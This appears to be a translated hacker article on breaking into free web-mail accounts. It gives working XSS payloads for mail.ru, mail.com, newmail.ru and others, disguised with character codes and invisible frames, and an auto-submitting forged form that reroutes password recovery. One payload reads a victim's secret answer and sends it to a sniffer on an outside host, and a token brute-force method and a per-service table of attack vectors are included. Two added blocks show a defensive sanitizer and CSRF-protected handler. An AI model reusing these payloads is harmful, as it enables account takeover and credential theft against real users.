OVERVIEW OF VULNERABILITIES IN FREE WEB-MAIL SERVICES

We continue with web mail. I carried out a small study of how various services can be broken into and present the results here. The attack technique is the same as before: a message containing JavaScript code is sent to someone else's address; the code runs when the message is opened and changes whatever information it likes in the user's mailbox settings. There is no point describing each server in detail, since the approach is the same everywhere, so I give a few examples and, at the end, a table. In most cases the break-in can be considered 100% reliable, with some assumptions: the user must read mail through the web interface, and when writing the exploits I assumed a standard platform, i.e. that the user has no exotic OS or browser and has not disabled JS execution.

WWW.MAIL.RU

I'll start with the number one mail service in Russia. At the moment, thanks to JavaScript getting through the filter and one developer error, this mailbox can be broken into. I assume the basic principles are well known. How do we get the password? 1 - change it without authorization. No good: you have to know the existing one. 2 - change the secret question and use the anti-amnesia service. Also won't work. 3 - set our own alternative e-mail to receive a new password generated by the system. Doesn't work either: the last two options are on the same form and are also password-protected. Even the remaining settings that interest us less (first name, surname, etc.) can no longer be changed without entering the current password. It would seem there are no options. However, there is a secondary, inconspicuous settings section, "Contact information" (ICQ, website, phone, place of work, time zone, etc.). In this section you can also specify a contact e-mail. The trick is that the reminder service uses not the alternative address in the registration information but the one entered in this questionnaire, so you can then get a password for the mailbox through the reminder service. It's that simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&[email protected] Admittedly, settings in a mail.ru box can no longer be changed using the GET method, so I'll describe the technical side in detail.

I. We send a message to the target mailbox with code that generates a frame directly in the body of the message, pointing at our site. If possible, the script should work without any user interaction (clicking, mouseover, loading images, etc.):

 <embed src="javascript:document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.yourdomain.com/yourscript.html></iframe>';this.wav">
 <p id='xxx'>
To make sure the script works fully, and to disguise it, we convert it to:
 <embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.com/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0>
 <p id='xxx'>
In this form, character codes replace letters in the names of the javascript and iframe elements, and the mail script does not filter them. The line status=location; shows the local URL in the status bar so that nothing unusual flickers there and arouses suspicion. The width and height attributes of both the frame and the embed are set to zero, which makes them invisible.

II. On the resource http://yoursite.ru we place an HTML document with a form that sends the changed data to the mail.ru server.

The contents of yourscript.html:
 <form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
 <input type="hidden" name="page" value="2">
 <input type="hidden" name="Email" value="[email protected]">
 <input type="hidden" value="Save" name="Save">
 </form>
 <script>
 document.anketa.submit()
 </script>
Notes: the client part of the script is guaranteed to work unmodified only in IE; the submission form is hosted on a separate site specifically to keep the message itself small.
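The vectors above all rely on the mail server rendering a message body without decoding character references before checking URL schemes. As an added example (not from the original article), here is a minimal server-side sanitizer of the kind that stops them: it drops embed/style/iframe elements outright, strips event-handler attributes, and normalises attribute URLs (entity decoding, removal of control characters) before the scheme check, so an encoded "javascript" in src, or a url() inside an inline style, does not slip past. dangerous_url returns True when an attribute URL resolves to a scripted or opaque scheme; the sample message and all names are constructed for this illustration.

```python
import html, re
from html.parser import HTMLParser

DROP_CONTENT = {"script", "style", "object", "iframe", "frame", "applet"}
DROP_VOID = {"embed", "link", "meta", "base"}     # removed outright, nothing to skip
URL_ATTRS = {"src", "href", "action", "background", "lowsrc", "dynsrc"}
# Non-printable characters are stripped before the scheme check, so "java\tscript:"
# or a still-encoded "j&#97;vascript:" is recognised as javascript:.
_NOISE = re.compile(r"[^\x21-\x7e]")
_BAD_SCHEME = re.compile(r"^(javascript|vbscript|livescript|data):", re.I)
_BAD_CSS = re.compile(r"url\s*\(|expression\s*\(|@import|javascript:", re.I)

def dangerous_url(value):
    return bool(_BAD_SCHEME.match(_NOISE.sub("", html.unescape(value))))

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0          # skip > 0 while inside a dropped element
    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        if self.skip or tag in DROP_VOID:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if (name.startswith("on")                                   # event handlers
                    or (name in URL_ATTRS and dangerous_url(value))     # scripted URLs
                    or (name == "style" and _BAD_CSS.search(html.unescape(value)))):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    handle_startendtag = handle_starttag     # <br/> and other void tags need no close
    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

def sanitize_email_html(body):
    p = MailSanitizer(); p.feed(body); p.close()
    return "".join(p.out)

SAMPLE = ('<p>Hello</p><embed src="j&#97;vascript:alert(1);this.wav" width=0 height=0>'  # constructed
          '<img src="java\tscript:alert(1)"><style>@import url(javascript:alert(1));</style>'
          '<span id="out" style="background:url(javascript:alert(1))">x</span><a href="https://example.com" onclick="alert(1)">ok</a>')
```

Running sanitize_email_html(SAMPLE) leaves only the paragraph, a bare img, the span without its style and the link without its handler; every url() in inline CSS is refused, which is the conservative choice for a mail client.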


WWW.MAIL.COM

Now a slightly different kind of security error, with http://mail.com as the example. If you use the password reminder service, then to get the password you need only enter the correct answer to the secret question (one of the options). So we set ourselves the task of obtaining that answer. This is easily done. When I went into the mailbox properties and looked through the registration information, I saw that the answer to the secret question is not hidden, which lets us read its value with JavaScript.

We inject the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form name: profileform
Name of the text field holding the secret answer: hint_a
In the end, to steal the answer to the secret question you need to open the settings page, run JavaScript, read the value of document.profileform.hint_a.value and pass it to the sniffer together with the environment variable REQUEST_URI.

Ready-made version:
 <style>@import url(javascript:document.getElementById('out').innerHTML="<iframe src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=`str=document.zero.profileform.hint_a.value;path='http://zero.h12.ru/stat/capt.php?';document.zero.location=path+str`></iframe>");</style>
 <span id='out'></span>
The settings page loads in the generated frame named zero. When loading finishes, the OnLoad handler runs the script that reads the secret answer and then, through the same frame, sends it to the sniffer. Now it is enough to open http://zero.h12.ru/stat/log.php and find the needed information in the "Host" line.

WWW.NEWMAIL.RU

In my opinion a fairly popular mail service, so I'll describe it in detail, especially since taking over someone else's account is much easier than it seems at first glance. You could do this: send a message with a script that, on startup, obtains the session id, generates the required requests, and changes the alternative e-mail (to which the password is subsequently sent) and the secret question and answer. However, if any other address is given in the reminder request, the password is sent to it, provided the secret answer is correct. And a further observation: the session id is not needed at all to change the settings. Plus, all tags are allowed. All of this reduces the code to a couple of lines:
 <iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>

WWW.E-MAIL.RU

The method of breaking into e-mail.ru doesn't quite fit the general theme of the article, but it's still mail :) . When I needed to get the password for one mailbox, I registered my own account as usual and began investigating the system. The first thing that caught my eye was the ability to set a new password and a secret question and answer without entering the old password. The plan of action is the usual one: check tag filtering, get the ID and execute the request. However, a special variable utoken, contained in the body of the document, is used to change the settings. After experimenting with changing the question and answer using a previously known utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&[email protected]&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ I came to the conclusion that neither the ID nor cookies are required to change the settings. At the same time, after watching utoken, it turned out that the four-digit hexadecimal number after the e-mail address [email protected] lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest, you need to try only 7 values: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. Once the number is guessed, we get into the desired box.

Notes: some things have changed since. The password recovery service no longer works, so it is advisable to change the password straight away. The address for changing settings has also changed:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&[email protected]&[email protected]&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ The method does not work every time. Probably it still requires that the user log into the mail through the web from time to time.
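The three server-side failures described above, a settings form with no anti-forgery token (the anketa POST), a state change accepted on a plain GET (the newmail.ru iframe) and a token drawn from only seven values (utoken), share one fix. As an added example, not from the original article, the hypothetical handler below issues a session-bound HMAC token, refuses GET for state changes, compares the token in constant time and additionally demands the current password for any field that feeds password recovery. update_settings, check_password and the request/session dictionaries are assumed shapes, not any real service's API.

```python
import hmac
import hashlib
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret; generated here for the demo

# Fields that feed password recovery: changing any of them must also require the
# current password, otherwise a forged request can reroute the reminder.
RECOVERY_FIELDS = {"password", "alt_email", "contact_email", "secret_question", "secret_answer"}

def issue_csrf_token(session_id):
    # Bound to the session and 256 bits wide: unlike a token drawn from a handful
    # of values, it cannot be enumerated, and it is useless for another session.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def token_is_valid(session_id, token):
    return isinstance(token, str) and hmac.compare_digest(issue_csrf_token(session_id), token)

def update_settings(req, session, check_password):
    """Hypothetical settings handler; returns (http_status, reason)."""
    form = req["form"]
    if req["method"] != "POST":                       # never change state on GET
        return 405, "state changes require POST"
    if not token_is_valid(session["id"], form.get("csrf")):
        return 403, "missing or foreign CSRF token"   # a cross-site form cannot supply it
    changes = {k: v for k, v in form.items() if k not in ("csrf", "current_password")}
    if changes.keys() & RECOVERY_FIELDS and not check_password(session["user"], form.get("current_password", "")):
        return 401, "current password required for recovery-related fields"
    return 200, "updated: " + ", ".join(sorted(changes))

if __name__ == "__main__":
    session = {"id": "sess-1", "user": "victim"}
    ok = lambda user, pw: pw == "correct horse"       # stand-in for the real password check
    # Forged auto-submitted form in the shape of the anketa request: no token, so 403.
    print(update_settings({"method": "POST", "form": {"page": "2", "Email": "x@example.com", "Save": "Save"}}, session, ok))
    # Forged GET in the shape of the chpass.dhtml iframe: 405.
    print(update_settings({"method": "GET", "form": {"cp_quest": "Q", "cp_answ": "A"}}, session, ok))
```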

Table of characteristics of free web-mail servers

SERVER | JAVASCRIPT | VULNERABILITY
www.km.ru (km.ru) | img src=javascript: | The password can be read from the password field on the settings page
www.mail.ru (inbox.ru, bk.ru, list.ru) | embed src=javascript: | The alternative e-mail can be changed
www.mail.com (email.com, post.com, myself.com, consultant.com and others) | @import url(javascript:); | The settings page shows the answer to the security question
www.newmail.ru (nm.ru, hotmail.ru, orc.ru, nightmail.ru) | any | Read/change the question and answer; the password remains valid
www.netman.ru and www.mailgate.ru (the same mailer, about 80 domains) | img src=javascript:, style=background:url(javascript:) | The answer to the security question can be stolen if one is set. A forwarding address can also be set (copies are not kept)
www.yandex.ru | onError, onLoad | Deletion of the *.narod.ru site (JS not required)
www.ukr.net | embed src=javascript:this.wav> | Read the answer to the security question
www.nextmail.ru (xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru) | embed src="javascript: | Change/steal the answer to the security question
www.hotbox.ru (pochta.ru, pisem.net, fromru.com, land.ru and others) | many ways | Account deletion
www.rin.ru | embed src=javascript: | Read the secret answer